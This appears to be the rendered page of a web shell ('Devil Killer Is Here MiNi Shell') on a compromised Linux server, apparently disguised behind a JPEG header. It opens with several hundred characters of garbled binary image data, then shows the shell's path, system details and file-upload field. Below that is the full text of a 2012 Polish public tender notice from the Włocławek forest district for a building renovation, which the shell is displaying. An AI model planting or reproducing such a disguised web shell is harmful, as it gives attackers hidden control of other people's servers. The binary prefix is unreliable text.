JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/300652-N-2012.html

<p class="kh_header"><b>Włocławek: Remont wraz z ulepszeniami funkcji wewnętrznej budynku garażowo-gospodarczego w osadzie Leśnictwa Kurowo na dz. ew. nr 260 w ob. ewidencyjnym Kurowo-Babia Góra Gm. Baruchowo.</b><br>
<b>Numer ogłoszenia: 300652 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Włocławek , ul. Ziębia 13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2349800 w. 17, faks 054 2349281.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL LP Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wraz z ulepszeniami funkcji wewnętrznej budynku garażowo-gospodarczego w osadzie Leśnictwa Kurowo na dz. ew. nr 260 w ob. ewidencyjnym Kurowo-Babia Góra Gm. Baruchowo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na remoncie wraz                       z ulepszeniem funkcji wewnętrznej budynku gospodarczego położonego w Leśnictwie Kurowo na działce ewidencyjnej numer 260 położonej w obrębie ewidencyjnym Kurowo-Babia Góra, Gm. Baruchowo.
	Dane techniczne budynku:
a.	wysokość budynku  - 7,16 m 
b.	pow. zabudowy - 178,00 m2
c.	kubatura budynku - 997.00 m2
d.	długość budynku - 21,64 m
e.	szerokość budynku - 8,24 m
f.	budynek wykonany jest w technologii tradycyjnej o ścianach murowanych z pustaków.
2.  Zakres prac remontowych obejmuje:
a.	wymiana pokrycia dachowego z płyt eternitowych, wraz z łaceniem. Przedłużenie końcówki krokwi oraz zamontowanie nowe krokwie zewnętrzne na nowej konstrukcji wsporczej. Zastosować drewno C27 czterostronnie heblowane o przekroju dla krokwi 8/16 cm, elementów wsporczych 15/15 cm.
b.	wykonanie nowego pokrycia z blachy dachówkowej z rdzenia stalowego grubości 0,5 - 0,6 mm ze stali S280, cynkowanego ogniowo z powłoką Zn 275 g/m2, co daje około 20 mikronów grubości, powlekaną farbą minimum poliestrową w kolorze naturalnej dachówki, w systemie warstwy szczepnej oraz podkładowej i nawierzchniowej. Grubość powłoki malarskiej minimum 20 mikrometrów. Blachę należy montować do łat za pomocą poprzez wkręty z podkładami EPDM w ilości 6-9 szt/m2. Należy zamontować nowe obróbki wraz z rynnami i spustami odpływowymi. Należy zastosować folię dachową półprzepuszczalną, łaty i kont łaty drewniane. W cześci zewnętrznej dachu należy wykonać drewnianą heblowaną podbitkę dachu. Wewnętrzne elementy drewniane - w tym isniejące - należy zaimpregnować środkiem np.: Fobosem 4M. Elementy zewnętrzne drewniane należy również zaimpregnować np. Sadolinem Ekstra. 
c.	wykonanie tynków cementowo wapiennych kat. III ścian zewnętrznych fluatowaniem oraz dwukrotnym malowaniem ścian zewnętrznych.
d.	wykonanie zamurowania otworów z zastosowaniem bloczków gazobetonowych odmiany 600, grubości 24 cm, na zaprawie cementowo wapiennej m.5. Ściany obustronnie otynkować. Nad nowymi otworami zamontować prefabrykowane nadproża typu 2L19.
e.	wykonanie pod ścianą wewnetrzną między pomieszczeniami 2 i 5 nową ławę żelbetową o przekroju 40/40 cm. 
f.	należy zamontować nowe wrota garażowe typu Hormann podnoszone, segmentowe, nieocieplane. 
g.	zamontowanie nowych drzwi wewnętrznych i zewnętrznych stalowych z dwoma zamkami.
h.	zamontowanie nowych wrót drewnianych do pomieszczenia przejazdowego.
i.	zamontowanie nowej stolarki okiennej z drewna klejonego, ze szklem zespolonym u1,0 W/m2K. Podokienniki zewnętrzne z blachy powlekanej.
j.	utylizacji odpadów z rozbiórki zgodnie z obowiązującymi przepisami w tym materiałów niebezpiecznych zawierających azbest  i dostarczenia kart odpadu Inwestorowi najpóźniej                w dniu odbioru.
Całość robót należy wykonać zgodnie z obowiązującymi warunkami technicznymi
dokumentacji technicznej.
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna stanowiąca zał. nr 8 do SIWZ.
3.  Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień:
45111300-1	Roboty rozbiórkowe
4560000-7	 Roboty w zakresie wykonania pokryć i konstrukcji dachowych  i inne podobne roboty
45443000-4	 Roboty elewacyjne
4.  Zamawiający dopuszcza powierzenie wykonania części  zamówienia podwykonawcom.
W takim przypadku, Wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia (zakresy), których wykonanie zamierza powierzyć podwykonawcom.
5.  Dodatkowe wymagania stawiane Wykonawcy:
5.1 Roboty budowlane należy wykonać:
- zgodnie z dokumentacja projektową dostarczoną przez Zamawiającego - stanowiącą zał nr 8 d SIWZ, zasadami wiedzy technicznej, obowiązującymi przepisami i normami oraz kosztorysem ofertowym i zawartą umową, której wzór stanowi zał. Nr 7 do SIWZ.
- zgodnie z warunkami technicznymi określonymi w specyfikacji technicznej zał. Nr 8 do SIWZ
- zgodnie z przepisami: 
Ustawa z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.)
Zarządzenie Ministra Gospodarki Przestrzennej i Budownictwa z dnia 15 grudnia 1994 r. w sprawie dziennika budowy oraz tablicy informacyjnej (M .P. Nr 2 z 1995 r., poz. 29).
-  zgodnie z przepisami wykonawczymi rozporządzenia Ministra Gospodarki i Pracy z dnia 14 października 2005r w sprawie bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów(Dz.U. z 2005r. Nr 216 poz 1824) i rozporządzenia Ministra Gospodarki,Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz.U.z 2004r. Nr 71 poz.649,ze zm. Dz.U. z 2010r. Nr 162 poz. 1089)
5.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.   
5.3  Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
5.4 Wymagany okres rękojmi: minimum 36 miesięcy na wykonane roboty i użyte materiały oraz urządzenia, liczony od dnia zakończenia robót budowlanych, czyli od dnia podpisania bezusterkowego protokółu końcowego odbioru robót.
5.5 Koszt zabezpieczenia terenu robót musi być włączony w cenę oferty.
5.6 Materiały użyte do wykonania zadania musza posiadać deklaracje zgodności lub certyfikat zgodności z polską norma lub aprobata techniczną w przypadku braku polskich norm przenoszących europejskie normy zharmonizowane. Wykonawca wyłoniony w postępowaniu zobowiązany będzie dostarczyć w/w dokumenty przy odbiorze ostatecznym zadania.
5.7 Podczas realizacji robót Wykonawca udostępni na żądanie Zamawiającego wgląd w materiały, które będą użyte do wykonania przedmiotu zamówienia.
5.8 Załatwienie wszelkich formalności i kosztów związanych z wykonaniem przedmiotu zamówienia leży po stronie Wykonawcy robót.
Uwaga: Podane w dokumentacji projektowej oraz SIWZ nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy   z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego i funkcjonalnego założonego w projekcie.
Zamawiający dopuszcza w każdym przypadku użycie materiału równoważnego pod względem istotnych (głównych) parametrów technicznych i użytkowych, przy zachowaniu, co najmniej tego samego poziomu jakości, trwałości oraz kompatybilności z pozostałymi materiałami użytymi przy realizacji zamówienia; dopuszczalne są jedynie takie zmiany materiałów, które mieszczą się w ramach zawartych w dokumentacji technicznej i specyfikacji technicznej rozwiązań konstrukcyjnych, technologicznych i technicznych, co wyraża się niedopuszczeniem przez Zamawiającego składania ofert wariantowych.
Przyjęcie rozwiązań równoważnych powodujące konieczność ingerencji w dokumentację projektową i wydane decyzje administracyjne wymagają ewentualnej zgody autora projektu w zakresie ochrony praw autorskich. Koszty związane z koniecznością zmian w projekcie i wydanych decyzjach administracyjnych leżą po stronie Wykonawcy. Termin wykonania całości przedmiotu zamówienia musi uwzględniać czas niezbędny na wykonanie ewentualnych zmian.
W przypadku wykorzystania zamiennych materiałów, bądź urządzeń innych niż podano w dokumentacji technicznej należy zachować niezmienne parametry pracy i budowy urządzeń oraz  materiałów opisanych w tej dokumentacji.
6. Termin wykonania zamówienia
60 dni od daty podpisania umowy, jednak nie później niż do 1.12.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.60.00.00-7, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Zamawiający wymaga wniesienia wadium  w wysokości: 2100,00zł (słownie: dwa tysiące sto złotych 00/100)
2) Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu,przelewem na rachunek Zamawiającego: BGŻ SA o/Włocławek 87 2030 0045 1110 0000 0037 6160 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy wpłata:
Remont wraz z ulepszeniami funkcji wewnętrznej budynku garażowo-gospodarczego w osadzie Leśnictwa Kurowo na dz. ew. nr 260 w ob. ewidencyjnym Kurowo-Babia Góra Gm. Baruchowo
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz. 275)
4) Wadium wnoszone w formie innej niż pieniądz wykonawca załącza do oferty.
5) Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6) Wadium musi być wniesione przed upływem terminu składania ofert. tj. do dnia 29-08-2012r. do godz. 9.00.
7) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego.
Wniesienie wadium w formie innej niż pieniężna bedzie skuteczne, jeżeli zostanie załączone do oferty.
8) Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została uznana jako najkorzystniejsza, z zastrzeżeniem ust. 11.
10) Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.
11) Wadium wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie (w przypadku jeżeli wadium zostało wniesione w pieniądzu),
12) Wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zostanie zatrzymane wraz z odsetkami w przypadku, gdy: 
a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym i zwróci je na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że uzyskał odpowiednio: zezwolenia, pozwolenia, decyzje zatwierdzenia programu gospodarowania odpadami niebezpiecznymi albo złożył organowi informację o sposobie gospodarowania odpadami niebezpiecznymi, zgodnie z przepisami wykonawczymi Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów                  i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. z 2004r. Nr 71 poz 649 ze zm. Dz.U z 2010r Nr 162 poz.1089)
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt III.4 do III.6 ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż  wykonawca spełnia wyżej wymienione warunki</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że    w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie odrębne roboty budowlane              w zakresie polegające na wybudowaniu lub remoncie lub przebudowie budynku gospodarczego albo mieszkalnego, o wartości nie mniejszej niż 100 tys. zł.  brutto łącznie
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt III.4 do III.6 ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż  wykonawca spełnia wyżej wymienione warunki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca, wykaże, że dysponuje co najmniej:
-trzema osobami na stanowiskach robotniczych,
- jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,wynikające  z ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień, i  minimum dwuletnie doświadczenie w kierowaniu robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U z 2010 r. nr 243, poz. 1623 z poźn. Zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowski Unii Europejskiej (Dz.U z 2008r. nr 63, poz. 394)
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt III.4 do III.6 ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż  wykonawca spełnia wyżej wymienione warunki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli Wykonawca wykaże posiadanie :  
-  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  na kwotę minimum 100 tys. zł.
- minimalnej zdolności kredytowej lub posiadanie środków w kwocie nie mniejszej niż 40 tys. zł.                 Z informacji banku ub spółdzielczej kasy oszczędnościowo kredytowejpowinno jednoznacznie wynikać, że Wykonawca wykazuje zdolność kredytową lub posiada środki w ww. wysokości, a nie domniemanie lub ewentualną możliwość posiadania tych środków.  Informacje winny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na PLN. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień wystawienia dokumentu potwierdzającego spełnianie warunku.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt III.4 do III.6 ogłoszenia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż  wykonawca spełnia wyżej wymienione warunki</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

